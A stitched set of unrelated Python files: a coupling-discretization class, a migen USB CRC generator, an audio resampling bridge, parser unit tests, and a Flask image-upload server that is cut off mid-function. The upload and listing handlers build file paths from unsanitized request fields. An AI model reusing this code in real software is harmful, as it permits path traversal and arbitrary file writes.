        super().__init__(self.compute_coefficients, max_nof_coefficients=max_nof_coefficients)
        # Everything is computed eagerly here; compute_coefficients below only
        # signals that no further coefficients can be produced.
        try:
            self.gamma_buf[:], self.xi_buf[:] = self.get_mean_coefficients(max_nof_coefficients)
        except ZeroDivisionError:
            print('Cannot calculate ' + str(max_nof_coefficients) + ' coefficients. Encountered div/0')
            raise
        self._set_next_n(max_nof_coefficients)

    def get_interval_avg(self, a, b):
        """
        Returns the J-weighted average position in the interval [a, b],
        i.e. Int_a^b x*J(x) dx / Int_a^b J(x) dx.
        (Docstring fix: the original said "[1a, b]".)
        """
        return quad(self.Jx, a=a, b=b, epsabs=self.epsabs, epsrel=self.epsrel, limit=self.limit)[0] / \
               quad(self.J, a=a, b=b, epsabs=self.epsabs, epsrel=self.epsrel, limit=self.limit)[0]

    def get_mean_coefficients(self, nof_coefficients):
        """
        Calculates the mean discretization coefficients.
        :returns: (couplings, energies) arrays of length nof_coefficients
        """
        interval_points = np.empty(nof_coefficients+2)
        # include the endpoints of the interval
        interval_points[0] = self.domain[0]
        interval_points[-1] = self.domain[1]
        x0 = self.get_interval_avg(self.domain[0], self.domain[1])
        interval_points[1] = x0
        # iteratively determine the points, that divide J by equal weight
        for n in range(2, nof_coefficients+1):
            last_points = np.empty(n+1)
            last_points[0] = self.domain[0]
            last_points[-1] = self.domain[1]
            last_points[1:-1] = interval_points[1:n]
            for pt_idx in range(n):
                interval_points[pt_idx+1] = self.get_interval_avg(last_points[pt_idx], last_points[pt_idx+1])
        # Calculate the couplings in the above determined intervals:
        # each coupling is sqrt of the J-weight between interval midpoints
        # (domain edges for the first/last interval).
        couplings = np.empty(nof_coefficients)
        for pt_idx in range(1, nof_coefficients+1):
            a = (interval_points[pt_idx-1] + interval_points[pt_idx])/2 if pt_idx > 1 else interval_points[0]
            b = (interval_points[pt_idx] + interval_points[pt_idx+1])/2 if pt_idx < nof_coefficients else \
                interval_points[nof_coefficients+1]
            couplings[pt_idx-1] = np.sqrt(quad(self.J, a=a, b=b, epsabs=self.epsabs, epsrel=self.epsrel,
                                               limit=self.limit)[0])
        return couplings, interval_points[1:-1]

    def compute_coefficients(self, stop_n):
        """
        Immediately raises a StopCoefficients exception, because everything is already calculated in the constructor
        """
        raise StopCoefficients
|
<gh_stars>100-1000
#!/usr/bin/env python3
import functools
import operator
import unittest
from migen import *
from migen.fhdl.decorators import CEInserter, ResetInserter
from ..utils.CrcMoose3 import CrcAlgorithm
from ..utils.packet import crc16, encode_data, b
from .shifter import TxShifter
from .tester import module_tester
from ..test.common import BaseUsbTestCase
@CEInserter()
@ResetInserter()
class TxSerialCrcGenerator(Module):
    """
    Transmit CRC Generator
    TxSerialCrcGenerator generates a running CRC.
    https://www.pjrc.com/teensy/beta/usb20.pdf, USB2 Spec, 8.3.5
    https://en.wikipedia.org/wiki/Cyclic_redundancy_check
    Parameters
    ----------
    Parameters are passed in via the constructor.
    width : int
        Width of the CRC.
    polynomial : int
        CRC polynomial in integer form.
    initial : int
        Initial value of the CRC register before data starts shifting in.
    Input Ports
    ------------
    i_data : Signal(1)
        Serial data to generate CRC for.
    Output Ports
    ------------
    o_crc : Signal(width)
        Current CRC value.
    """
    def __init__(self, width, polynomial, initial):
        self.i_data = Signal()
        # Internal LFSR state; starts at `initial`, shifts one bit per clock.
        crc = Signal(width, reset=initial)
        crc_invert = Signal(1)
        # Feedback bit: incoming data XORed with the LFSR's top bit.
        self.comb += [
            crc_invert.eq(self.i_data ^ crc[width - 1])
        ]
        for i in range(width):
            rhs_data = None
            if i == 0:
                # Bit 0 takes the feedback bit directly.
                rhs_data = crc_invert
            else:
                if (polynomial >> i) & 1:
                    # Tap position of the polynomial: shift in previous bit XOR feedback.
                    rhs_data = crc[i - 1] ^ crc_invert
                else:
                    rhs_data = crc[i - 1]
            self.sync += [
                crc[i].eq(rhs_data)
            ]
        # Output is the complemented (1 ^ ...) and bit-reversed register.
        self.o_crc = Signal(width)
        for i in range(width):
            self.comb += [
                self.o_crc[i].eq(1 ^ crc[width - i - 1]),
            ]
def bytes_to_int(d):
    """Convert a list of bytes to an int

    Bytes are in LSB first.

    >>> hex(bytes_to_int([0, 1]))
    '0x100'
    >>> hex(bytes_to_int([1, 2]))
    '0x201'
    """
    v = 0
    # BUG FIX: the loop variable used to be named `d`, shadowing the
    # parameter; it worked, but was fragile and confusing.
    for i, byte in enumerate(d):
        v |= byte << (i * 8)
    return v
def cols(rows):
    """
    >>> a = [
    ...  [1, 2],
    ...  ['a', 'b'],
    ...  [4, 5],
    ... ]
    >>> for c in cols(a):
    ...  print(c)
    [1, 'a', 4]
    [2, 'b', 5]
    >>> a = [
    ...  [1, 2, 3],
    ...  ['a', 'b', 'c'],
    ... ]
    >>> for c in cols(a):
    ...  print(c)
    [1, 'a']
    [2, 'b']
    [3, 'c']
    """
    # Transpose a list of equal-length rows into a list of columns.
    ncols = len(rows[0])
    transposed = [[] for _ in range(ncols)]
    for ci in range(ncols):
        for row in rows:
            # Every row must be as long as the first one.
            assert len(row) == ncols, "len(%r) != %i" % (row, ncols)
            transposed[ci].append(row[ci])
    return transposed
def lfsr_serial_shift_crc(lfsr_poly, lfsr_cur, data):
    """
    shift_by == num_data_bits
    len(data_cur) == num_data_bits
    >>> for i in range(5):
    ...   l = [0]*5; l[i] = 1
    ...   r = lfsr_serial_shift_crc(
    ...      lfsr_poly=[0,0,1,0,1], # (5, 2, 0)
    ...      lfsr_cur=l,
    ...      data=[0,0,0,0],
    ...   )
    ...   print("Min[%i] =" % i, r)
    Min[0] = [1, 0, 0, 0, 0]
    Min[1] = [0, 0, 1, 0, 1]
    Min[2] = [0, 1, 0, 1, 0]
    Min[3] = [1, 0, 1, 0, 0]
    Min[4] = [0, 1, 1, 0, 1]
    >>> for i in range(4):
    ...   d = [0]*4; d[i] = 1
    ...   r = lfsr_serial_shift_crc(
    ...      lfsr_poly=[0,0,1,0,1], # (5, 2, 0)
    ...      lfsr_cur=[0,0,0,0,0],
    ...      data=d,
    ...   )
    ...   print("Nin[%i] =" % i, r)
    Nin[0] = [0, 0, 1, 0, 1]
    Nin[1] = [0, 1, 0, 1, 0]
    Nin[2] = [1, 0, 1, 0, 0]
    Nin[3] = [0, 1, 1, 0, 1]
    """
    # Work LSB-first internally; inputs/outputs are MSB-first lists.
    poly = lfsr_poly[::-1]
    bits = data[::-1]
    size = len(poly)
    assert size > 1
    assert len(lfsr_cur) == size
    state = list(lfsr_cur)
    # Clock the serial LFSR once per data bit.
    for bit in bits:
        msb = state[size - 1]
        # Shift upward; XOR in feedback at the polynomial's tap positions.
        for i in range(size - 1, 0, -1):
            state[i] = (state[i - 1] ^ msb ^ bit) if poly[i] else state[i - 1]
        state[0] = msb ^ bit
    # Return MSB-first again.
    return state[::-1]
def print_matrix(crc_width, cols_nin, cols_min):
    """
    >>> crc_width = 5
    >>> data_width = 4
    >>> poly_list = [0, 0, 1, 0, 1]
    >>> _, cols_nin, cols_min = build_matrix(poly_list, data_width)
    >>> print_matrix(crc_width, cols_nin, cols_min)
       0 d[ 0],      ,      , d[ 3],      , c[ 1],      ,      , c[ 4]
       1      , d[ 1],      ,      ,      ,      , c[ 2],      ,
       2 d[ 0],      , d[ 2], d[ 3],      , c[ 1],      , c[ 3], c[ 4]
       3      , d[ 1],      , d[ 3],      ,      , c[ 2],      , c[ 4]
       4      ,      , d[ 2],      , c[ 0],      ,      , c[ 3],
    """
    # Print, per CRC output bit, which data (d) and state (c) bits feed
    # its XOR network; unused positions are blank-padded.
    for row in range(crc_width):
        cells = []
        for j, use in enumerate(cols_nin[row]):
            cells.append('d[%2i]' % j if use else '     ')
        for j, use in enumerate(cols_min[row]):
            cells.append('c[%2i]' % j if use else '     ')
        body = ", ".join("{:>5s}".format(c) for c in cells).rstrip()
        print("{:4d} {}".format(row, body))
def build_matrix(lfsr_poly, data_width):
    """
    >>> print("\\n".join(build_matrix([0,0,1,0,1], 4)[0]))
    lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 0], [1, 0, 0, 0]) = [0, 0, 1, 0, 1]
    lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 0], [0, 1, 0, 0]) = [0, 1, 0, 1, 0]
    lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 0], [0, 0, 1, 0]) = [1, 0, 1, 0, 0]
    lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 0], [0, 0, 0, 1]) = [0, 1, 1, 0, 1]
    <BLANKLINE>
    lfsr([0, 0, 1, 0, 1], [1, 0, 0, 0, 0], [0, 0, 0, 0]) = [1, 0, 0, 0, 0]
    lfsr([0, 0, 1, 0, 1], [0, 1, 0, 0, 0], [0, 0, 0, 0]) = [0, 0, 1, 0, 1]
    lfsr([0, 0, 1, 0, 1], [0, 0, 1, 0, 0], [0, 0, 0, 0]) = [0, 1, 0, 1, 0]
    lfsr([0, 0, 1, 0, 1], [0, 0, 0, 1, 0], [0, 0, 0, 0]) = [1, 0, 1, 0, 0]
    lfsr([0, 0, 1, 0, 1], [0, 0, 0, 0, 1], [0, 0, 0, 0]) = [0, 1, 1, 0, 1]
    <BLANKLINE>
    Mout[4] = [0, 0, 1, 0] [1, 0, 0, 1, 0]
    Mout[3] = [0, 1, 0, 1] [0, 0, 1, 0, 1]
    Mout[2] = [1, 0, 1, 1] [0, 1, 0, 1, 1]
    Mout[1] = [0, 1, 0, 0] [0, 0, 1, 0, 0]
    Mout[0] = [1, 0, 0, 1] [0, 1, 0, 0, 1]
    """
    lfsr_poly_size = len(lfsr_poly)
    # data_width*lfsr_polysize matrix == lfsr(0,Nin)
    rows_nin = []
    # (a) calculate the N values when Min=0 and Build NxM matrix
    #  - Each value is one hot encoded (there is only one bit)
    #  - IE N=4, 0x1, 0x2, 0x4, 0x8
    #  - Mout = F(Nin,Min=0)
    #  - Each row contains the results of (a)
    #  - IE row[0] == 0x1, row[1] == 0x2
    #  - Output is M-bit wide (CRC width)
    #  - Each column of the matrix represents an output bit Mout[i] as a function of Nin
    info = []
    for i in range(data_width):
        # lfsr_cur = [0,...,0] = Min
        lfsr_cur = [0,]*lfsr_poly_size
        # data = [0,..,1,..,0] = Nin
        data = [0,]*data_width
        data[i] = 1
        # Calculate the CRC
        rows_nin.append(lfsr_serial_shift_crc(lfsr_poly, lfsr_cur, data))
        info.append("lfsr(%r, %r, %r) = %r" % (lfsr_poly, lfsr_cur, data, rows_nin[-1]))
    assert len(rows_nin) == data_width
    cols_nin = cols(rows_nin)[::-1]
    # lfsr_polysize*lfsr_polysize matrix == lfsr(Min,0)
    info.append("")
    rows_min = []
    for i in range(lfsr_poly_size):
        # lfsr_cur = [0,..,1,...,0] = Min
        lfsr_cur = [0,]*lfsr_poly_size
        lfsr_cur[i] = 1
        # data = [0,..,0] = Nin
        data = [0,]*data_width
        # Calculate the crc
        rows_min.append(lfsr_serial_shift_crc(lfsr_poly, lfsr_cur, data))
        info.append("lfsr(%r, %r, %r) = %r" % (lfsr_poly, lfsr_cur, data, rows_min[-1]))
    assert len(rows_min) == lfsr_poly_size
    cols_min = cols(rows_min)[::-1]
    # (c) Calculate CRC for the M values when Nin=0 and Build MxM matrix
    #  - Each value is one hot encoded
    #  - Mout = F(Nin=0,Min)
    #  - Each row contains results from (7)
    info.append("")
    # BUG FIX: iterate over the CRC output bits (lfsr_poly_size of them).
    # The original used range(data_width, -1, -1), which only coincided with
    # the correct bound when data_width == lfsr_poly_size - 1 and would
    # raise IndexError for data_width >= lfsr_poly_size.
    for i in range(lfsr_poly_size - 1, -1, -1):
        info.append("Mout[%i] = %r %r" % (i, cols_nin[i], cols_min[i]))
    return info, cols_nin, cols_min
@ResetInserter()
class TxParallelCrcGenerator(Module):
    """
    Transmit CRC Generator
    TxParallelCrcGenerator generates a running CRC.
    https://www.pjrc.com/teensy/beta/usb20.pdf, USB2 Spec, 8.3.5
    https://en.wikipedia.org/wiki/Cyclic_redundancy_check
    Parameters
    ----------
    Parameters are passed in via the constructor.
    width : int
        Width of the CRC.
    polynomial : int
        CRC polynomial in integer form.
    initial : int
        Initial value of the CRC register before data starts shifting in.
    Input Ports
    ------------
    i_data_payload : Signal(8)
        Byte wide data to generate CRC for.
    i_data_strobe : Signal(1)
        Strobe signal for the payload.
    Output Ports
    ------------
    o_crc : Signal(width)
        Current CRC value.
    """
    def __init__(self, data_width, crc_width, polynomial, initial=0):
        self.i_data_payload = Signal(data_width)
        self.i_data_strobe = Signal()
        self.o_crc = Signal(crc_width)
        crc_dat = Signal(data_width)
        crc_cur = Signal(crc_width, reset=initial)
        crc_next = Signal(crc_width, reset_less=True)
        # Reset value of the register as a list of bits, LSB first.
        crc_cur_reset_bits = [
            int(i) for i in "{0:0{width}b}".format(
                crc_cur.reset.value,width=crc_width)[::-1]]
        self.comb += [
            # Payload is consumed bit-reversed; output is the bit-reversed register.
            crc_dat.eq(self.i_data_payload[::-1]),
            # FIXME: Is XOR ^ initial actually correct here?
            self.o_crc.eq(crc_cur[::-1] ^ initial),
        ]
        self.sync += [
            If(self.i_data_strobe,
                crc_cur.eq(crc_next),
            ),
        ]
        # Polynomial as an MSB-first bit list.
        poly_list = []
        for i in range(crc_width):
            poly_list.insert(0, polynomial >> i & 0x1)
        assert len(poly_list) == crc_width
        # Derive the per-output-bit XOR networks from the serial LFSR matrices.
        _, cols_nin, cols_min = build_matrix(poly_list, data_width)
        crc_next_reset_bits = list(crc_cur_reset_bits)
        for i in range(crc_width):
            to_xor = []
            crc_next_reset_bit_i = []
            for j, use in enumerate(cols_nin[i]):
                if use:
                    to_xor.append(crc_dat[j])
                    crc_next_reset_bit_i.append(0)
            for j, use in enumerate(cols_min[i]):
                if use:
                    to_xor.append(crc_cur[j])
                    crc_next_reset_bit_i.append(crc_cur_reset_bits[j])
            # Fold the reset value through the same XOR network so crc_next's
            # reset matches what the network would produce after a reset.
            crc_next_reset_bits[i] = functools.reduce(operator.xor, crc_next_reset_bit_i)
            self.comb += [
                crc_next[i].eq(functools.reduce(operator.xor, to_xor)),
            ]
        crc_next_reset_value = int("0b"+"".join(str(i) for i in crc_next_reset_bits[::-1]), 2)
        crc_next.reset.value = crc_next_reset_value
class TxCrcPipeline(Module):
    """Feeds payload bytes through a TxShifter (byte -> serial bits) into a
    TxSerialCrcGenerator to compute a running 16-bit CRC.
    """
    def __init__(self):
        self.i_data_payload = Signal(8)
        self.o_data_ack = Signal()
        self.o_crc16 = Signal(16)
        self.reset = reset = Signal()
        reset_n1 = Signal()
        reset_n2 = Signal()
        self.ce = ce = Signal()
        # Delay the CRC generator's reset by two cycles relative to the
        # shifter's reset.
        self.sync += [
            reset_n2.eq(reset_n1),
            reset_n1.eq(reset),
        ]
        self.submodules.shifter = shifter = TxShifter(width=8)
        self.comb += [
            shifter.i_data.eq(self.i_data_payload),
            shifter.reset.eq(reset),
            shifter.ce.eq(ce),
            self.o_data_ack.eq(shifter.o_get),
        ]
        # Polynomial bits 15, 2, 0; register initialized to all ones.
        self.submodules.crc = crc_calc = TxSerialCrcGenerator(
            width      = 16,
            polynomial = 0b1000000000000101,
            initial    = 0b1111111111111111,
        )
        self.comb += [
            crc_calc.i_data.eq(shifter.o_data),
            crc_calc.reset.eq(reset_n2),
            crc_calc.ce.eq(ce),
            self.o_crc16.eq(crc_calc.o_crc),
        ]
|
<reponame>tuxu/soundbridge<filename>soundbridge.py<gh_stars>0
from __future__ import print_function, division
import numpy as np
import sounddevice as sd
import samplerate as sr
from fifo import FIFO
class OutputProcessor(object):
    """Basic output processor.

    Passes samples through by multiplying with `input_gain` and `output_volume`.
    """

    def __init__(self, input_gain=1.0, output_volume=1.0):
        self._input_gain = input_gain
        self._output_volume = output_volume

    @property
    def input_gain(self):
        """Input gain."""
        return self._input_gain

    @input_gain.setter
    def input_gain(self, value):
        self._input_gain = value

    @property
    def output_volume(self):
        """Output volume."""
        return self._output_volume

    @output_volume.setter
    def output_volume(self, value):
        self._output_volume = value

    def process(self, samples, _samplerate, **_kwargs):
        """Process output samples: scale by input gain and output volume."""
        scale = self._output_volume * self._input_gain
        return scale * samples
class FMOutputProcessor(OutputProcessor):
    """Frequency modulating output processor.

    Modulates samples onto a carrier frequency.
    """

    def __init__(self, input_gain=1.0, output_volume=1.0, carrier_frequency=500):
        super(FMOutputProcessor, self).__init__(input_gain, output_volume)
        self._carrier_frequency = carrier_frequency
        # Running FM phase, carried across buffers for continuity.
        self._last_fmphase = 0

    @property
    def carrier_frequency(self):
        """Carrier frequency (Hz)."""
        return self._carrier_frequency

    @carrier_frequency.setter
    def carrier_frequency(self, frequency):
        self._carrier_frequency = frequency

    def process(self, samples, samplerate, **kwargs):
        """Perform frequency modulation with samples and return output samples.
        """
        scaled = self.input_gain * samples
        t = (kwargs['time'].outputBufferDacTime +
             np.arange(scaled.size) / samplerate)
        carrier_phase = 2 * np.pi * self.carrier_frequency * t
        fm_phase = (self._last_fmphase +
                    2 * np.pi * np.cumsum(scaled) / samplerate)
        self._last_fmphase = fm_phase[-1]
        return self.output_volume * np.cos(carrier_phase + fm_phase)
class Soundbridge(object):
    """Bridge a sample producer to the sound output, resampling as required.
    """

    def __init__(self, input_samplerate, output_samplerate=None, bufsize=4096,
                 converter_type='sinc_fastest'):
        """
        :param input_samplerate: Rate (Hz) of the samples pushed in.
        :param output_samplerate: Output rate (Hz); defaults to the default
            output device's preferred samplerate.
        :param bufsize: Capacity of the input FIFO.
        :param converter_type: Resampler quality (see `samplerate` package).
        """
        if output_samplerate is None:
            # Fall back to the default output device's native rate.
            default_output = sd.default.device[1]
            device_parameters = sd.query_devices(default_output)
            output_samplerate = device_parameters['default_samplerate']
        self._output_samplerate = output_samplerate
        self._fifo = FIFO(bufsize)
        ratio = output_samplerate / input_samplerate
        self._resampler = sr.CallbackResampler(self._read_fifo, ratio,
                                               converter_type)
        self._outstream = sd.OutputStream(
            channels=1, samplerate=output_samplerate,
            callback=self._output_callback)
        # BUG FIX: removed the unused `_last_fmphase` attribute — FM phase
        # state lives in FMOutputProcessor, not in the bridge.
        self._output_processor = OutputProcessor()

    @property
    def output_processor(self):
        """Output processor."""
        return self._output_processor

    @output_processor.setter
    def output_processor(self, fun):
        self._output_processor = fun

    def push_samples(self, samples):
        """Push samples into the input buffer."""
        self._fifo.write(samples)

    def _read_fifo(self):
        """Input callback for the resampler: drain whatever is buffered."""
        frames = self._fifo.num_available()
        if frames == 0:
            # Return at least a single frame when the buffer is empty.
            return [0]
        return self._fifo.read(frames)

    def _output_callback(self, outdata, frames, time, status):
        """Output callback.

        Read samples from the resampler, turn them into output samples (via an
        output processor), and write them into the output buffer `outdata`.
        """
        samples = self._resampler.read(frames)
        # Zero-pad if the resampler delivered fewer frames than requested.
        samples = np.pad(samples, (0, frames - len(samples)), mode='constant')
        outdata[:, 0] = self._output_processor.process(
            samples, self._output_samplerate, time=time, status=status)

    def start(self):
        """Start output stream."""
        self._outstream.start()

    def stop(self):
        """Stop output stream."""
        self._outstream.stop()

    def __enter__(self):
        self.start()
        return self

    def __exit__(self, *args):
        self.stop()
        self._outstream.close()
|
<gh_stars>0
"""
@author <NAME> (github.com/CorentinGoet)
"""
import unittest
from AST import *
from lexer_pkg.lexem import Lexem, LexemTag
from lexer_pkg.lexer import Lexer
from parser_pkg.parser import Parser
class ParserTest(unittest.TestCase):
    """
    Test class for the parser_pkg.
    """

    def setUp(self):
        """
        Set up a fresh parser and lexer for every test.
        """
        self.parser = Parser()
        self.lexer = Lexer()

    def _read_source(self, path):
        """Return the contents of a minic source file.

        BUG FIX: the original open()/read()/close() pattern leaked the file
        handle if read() raised; a context manager always closes it.
        """
        with open(path, "r") as f:
            return f.read()

    def _tokenize_and_parse(self, path):
        """Tokenize the file at `path` and feed the lexems to the parser."""
        self.lexer.tokenize(self._read_source(path))
        self.parser.parse(self.lexer.lexems)

    def testPeek(self):
        """
        Test the peek function.
        """
        lexem = Lexem("123", LexemTag.INTEGER, [1, 0])
        self.parser.lexems = [lexem]
        self.assertEqual(self.parser.peek(), lexem)
        self.parser.lexems = []
        self.assertRaises(ValueError, self.parser.peek)

    def testExpectAccept(self):
        """
        Test the expect function.
        """
        lexem = Lexem("123", LexemTag.INTEGER, [1, 0])
        self.parser.lexems = [lexem]
        self.assertEqual(self.parser.expect(LexemTag.INTEGER), lexem)
        self.assertEqual(self.parser.lexems, [])
        self.parser.lexems = [lexem]
        self.assertRaises(TypeError, self.parser.expect, LexemTag.CHAR)

    def test_parse_program(self):
        """
        Test the parse_program function.
        """
        self._tokenize_and_parse("test_sources/test_program.minic")
        self.assertEqual(self.parser.lexems, [])
        self.assertEqual(self.parser.ast, Program(Declarations([]), Statements([])))

    def test_parse_declarations(self):
        """
        Test the parse_declarations function.
        """
        self._tokenize_and_parse("test_sources/test_declarations.minic")
        self.assertEqual(self.parser.lexems, [])
        declarations = Declarations([Declaration(Type(Types.INT), [Identifier("a")]),
                                     Declaration(Type(Types.INT), [Identifier("bTest2Var"), Identifier("c")]),
                                     Declaration(Type(Types.FLOAT), [Identifier("d")]),
                                     Declaration(Type(Types.FLOAT), [Identifier("e"), Identifier("f2Test")]),
                                     Declaration(Type(Types.CHAR), [Identifier("h")]),
                                     Declaration(Type(Types.CHAR), [Identifier("i"), Identifier("jTestVar")]),
                                     Declaration(Type(Types.BOOL), [Identifier("aTestVar")]),
                                     Declaration(Type(Types.BOOL), [Identifier("b"), Identifier("cTest2Var")])])
        self.assertEqual(self.parser.ast.declarations, declarations)

        # Test the parse_declarations function with a wrong declaration
        self.lexer.tokenize(self._read_source("test_sources/test_declaration_error.minic"))
        self.assertRaises(TypeError, self.parser.parse, self.lexer.lexems)

    def test_parse_assignment(self):
        """
        Test the parse_assignment function.
        """
        self._tokenize_and_parse("test_sources/test_assignment.minic")
        self.assertEqual(self.parser.lexems, [])

    def test_parse_if(self):
        """
        Test the parse_ifStatement function.
        """
        self._tokenize_and_parse("test_sources/test_ifStatement.minic")

    def test_parse_while(self):
        """
        Test the parse_whileStatement function.
        """
        self._tokenize_and_parse("test_sources/test_whileStatement.minic")
        self.assertEqual(self.parser.lexems, [])

    def test_parse_operators(self):
        """
        Test the parsing of operators.
        """
        self._tokenize_and_parse("test_sources/test_operators.minic")
        self.assertEqual(self.parser.lexems, [])

        # test operator errors
        self.lexer.tokenize(self._read_source("test_sources/test_operator_error.minic"))
        self.assertRaises(TypeError, self.parser.parse, self.lexer.lexems)
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import os
import os.path
import shutil
import sys
import re
import socket
from flask import current_app, Flask, jsonify, render_template, request, send_from_directory, redirect, url_for, got_request_exception
from flask.views import MethodView
from PIL import Image, ExifTags
__version__ = '0.0.4'
# Config
##################
BASE_DIR = '/home/kepek'  # root directory of all stored data
IMAGE_DIR = os.path.join(BASE_DIR, 'images')      # full-size originals
THUMB_DIR = os.path.join(BASE_DIR, 'thumbnails')  # cached thumbnails (mirrors IMAGE_DIR layout)
CHUNKS_DIR = os.path.join(BASE_DIR, 'chunks')     # temp storage for chunked uploads
THUMB_WIDTH = 250   # thumbnail bounding box (px)
THUMB_HEIGHT = 200
app = Flask(__name__, static_url_path='')
app.config.from_object(__name__)  # expose the module-level constants via app.config
# Utils
##################
# NOTE(review): `status` is accepted but never applied to the response —
# every response goes out with Flask's default status; confirm intended.
def make_response(status=200, content=None):
    """ Construct a response to an upload request.
        Success is indicated by a status of 200 and { "success": true }
        contained in the content.
        Also, content-type is text/plain by default since IE9 and below chokes
        on application/json. For CORS environments and IE9 and below, the
        content-type needs to be text/html.
    """
    # `request.is_xhr` was removed in Flask 1.0 — this targets an older
    # Flask; NOTE(review): replace with an X-Requested-With header check
    # when upgrading.
    return current_app.response_class(json.dumps(content,
        indent=None if request.is_xhr else 2), mimetype='text/plain')
def handle_upload(f, attrs, path):
    """Persist an uploaded file (possibly chunked) below IMAGE_DIR/path.

    :param f: file-like upload object (request.files['qqfile'])
    :param attrs: Fine-Uploader form fields (qqfilename, qquuid, qqpartindex, ...)
    :param path: directory, relative to IMAGE_DIR, to store the file in
    """
    chunked = False
    dest_folder = os.path.join(app.config['IMAGE_DIR'], path)
    dest = os.path.join(dest_folder, attrs['qqfilename'])

    # Chunked upload: each part goes to CHUNKS_DIR/<uuid>/<name>/<index>.
    # (`in` replaces the Python-2-only dict.has_key — same semantics.)
    if 'qqtotalparts' in attrs and int(attrs['qqtotalparts']) > 1:
        chunked = True
        dest_folder = os.path.join(app.config['CHUNKS_DIR'], attrs['qquuid'])
        dest = os.path.join(dest_folder, attrs['qqfilename'], str(attrs['qqpartindex']))

    save_upload(f, dest)

    # Last chunk received: stitch the parts together, then drop the temp dir.
    if chunked and (int(attrs['qqtotalparts']) - 1 == int(attrs['qqpartindex'])):
        combine_chunks(attrs['qqtotalparts'],
                       attrs['qqtotalfilesize'],
                       source_folder=os.path.dirname(dest),
                       dest=os.path.join(app.config['IMAGE_DIR'], path, attrs['qqfilename'])
                       )
        shutil.rmtree(os.path.dirname(os.path.dirname(dest)))
def save_upload(f, path):
    """Write the uploaded stream `f` to `path`, creating parent directories."""
    parent = os.path.dirname(path)
    if not os.path.exists(parent):
        os.makedirs(parent)
    with open(path, 'wb+') as destination:
        destination.write(f.read())
def combine_chunks(total_parts, total_size, source_folder, dest):
    """Concatenate chunk files "0".."total_parts-1" from source_folder into dest.

    :param total_parts: number of chunks (may be a string form field)
    :param total_size: expected total size in bytes (unused; kept for API compat)
    :param source_folder: directory holding the numbered chunk files
    :param dest: path of the combined output file (parents created as needed)
    """
    if not os.path.exists(os.path.dirname(dest)):
        os.makedirs(os.path.dirname(dest))
    with open(dest, 'wb+') as destination:
        # range() replaces the Python-2-only xrange() (identical here).
        for i in range(int(total_parts)):
            part = os.path.join(source_folder, str(i))
            with open(part, 'rb') as source:
                destination.write(source.read())
def flip_horizontal(im):
    """Mirror the image left-to-right."""
    return im.transpose(Image.FLIP_LEFT_RIGHT)

def flip_vertical(im):
    """Mirror the image top-to-bottom."""
    return im.transpose(Image.FLIP_TOP_BOTTOM)

def rotate_180(im):
    """Rotate the image by 180 degrees."""
    return im.transpose(Image.ROTATE_180)

def rotate_90(im):
    """Rotate the image by 90 degrees."""
    return im.transpose(Image.ROTATE_90)

def rotate_270(im):
    """Rotate the image by 270 degrees."""
    return im.transpose(Image.ROTATE_270)

def transpose(im):
    """Flip horizontally, then rotate 90 degrees."""
    return rotate_90(flip_horizontal(im))

def transverse(im):
    """Flip vertically, then rotate 90 degrees."""
    return rotate_90(flip_vertical(im))

# Transform to undo each EXIF orientation value; the tag is 1-based, so
# index 0 is a placeholder and 1 (normal orientation) is the identity.
orientation_funcs = [
    None,
    lambda x: x,
    flip_horizontal,
    rotate_180,
    flip_vertical,
    transpose,
    rotate_270,
    transverse,
    rotate_90,
]
def apply_orientation(im):
    """
    Extract the orientation EXIF tag from the image, which should be a PIL Image instance,
    and if there is an orientation tag that would rotate the image, apply that rotation to
    the Image instance given to do an in-place rotation.

    :param Image im: Image instance to inspect
    :return: A possibly transposed image instance
    """
    try:
        kOrientationEXIFTag = 0x0112
        if hasattr(im, '_getexif'):  # only present in JPEGs
            e = im._getexif()        # returns None if no EXIF data
            if e is not None:
                orientation = e[kOrientationEXIFTag]
                f = orientation_funcs[orientation]
                return f(im)
    except Exception:
        # Best effort: a missing orientation tag (KeyError/IndexError) or any
        # decode error just leaves the image untouched. BUG FIX: narrowed from
        # a bare `except:` so SystemExit/KeyboardInterrupt still propagate;
        # also fixed the 'orienattion' typo in the log message.
        app.logger.debug('Image orientation processing error')
    return im
@app.before_first_request
def init_rollbar():
    # Python-2-only hack forcing the default string encoding to UTF-8.
    # NOTE(review): reload(sys)/setdefaultencoding do not exist on Python 3.
    reload(sys)
    sys.setdefaultencoding('utf-8')
    # Rollbar error reporting is enabled only when a token is configured.
    rollbar_token = os.environ.get('ROLLBAR_TOKEN', None)
    if rollbar_token:
        import rollbar
        import rollbar.contrib.flask
        """init rollbar module"""
        rollbar.init(
            rollbar_token,
            'production',
            root=os.path.dirname(os.path.realpath(__file__)),
            allow_logging_basic_config=False
        )
        # Forward unhandled request exceptions to Rollbar.
        got_request_exception.connect(rollbar.contrib.flask.report_exception, app)
# Views
##################
@app.route("/")
def index():
    # The root URL just redirects to the directory listing at /list/.
    return redirect(url_for('list_dir'))
@app.route('/list/', defaults={'path': ''})
@app.route('/list/<path:path>')
def list_dir(path):
    """Render a sorted directory listing for IMAGE_DIR/path."""
    base = os.path.join( app.config['IMAGE_DIR'], path )
    entries = os.listdir(base)
    dirs = sorted(e for e in entries if os.path.isdir(os.path.join(base, e)))
    files = sorted(e for e in entries if os.path.isfile(os.path.join(base, e)))
    return render_template('list.html', dirs=dirs, basedir=path, parentdir=os.path.dirname(path.rstrip('/'))+'/', files=files, version=__version__)
@app.route('/static/<path:path>')
def send_static(path):
    """Serve a file from the bundled ``static`` directory."""
    static_root = 'static'
    return send_from_directory(static_root, path)
@app.route('/thumbnails/<path:path>')
def send_thumbnails(path):
    # Serve the cached thumbnail for *path*, generating it on first access.
    # The thumbnail of IMAGE_DIR/<name> is cached at THUMB_DIR/<name>_thumbnail.jpg
    # (THUMB_DIR mirrors IMAGE_DIR's directory layout).
    if not os.path.isfile( os.path.join(THUMB_DIR, path) ):
        app.logger.debug('No thumbnail found')
        # Strip the '_thumbnail.jpg' suffix to recover the source image path.
        image_path = os.path.join(IMAGE_DIR, re.sub('_thumbnail\.jpg$', '', path) )
        if os.path.isfile( image_path ):
            app.logger.debug('Generating thumbnail')
            thumbdir = os.path.dirname(os.path.join(THUMB_DIR, path))
            if not os.path.exists( thumbdir ):
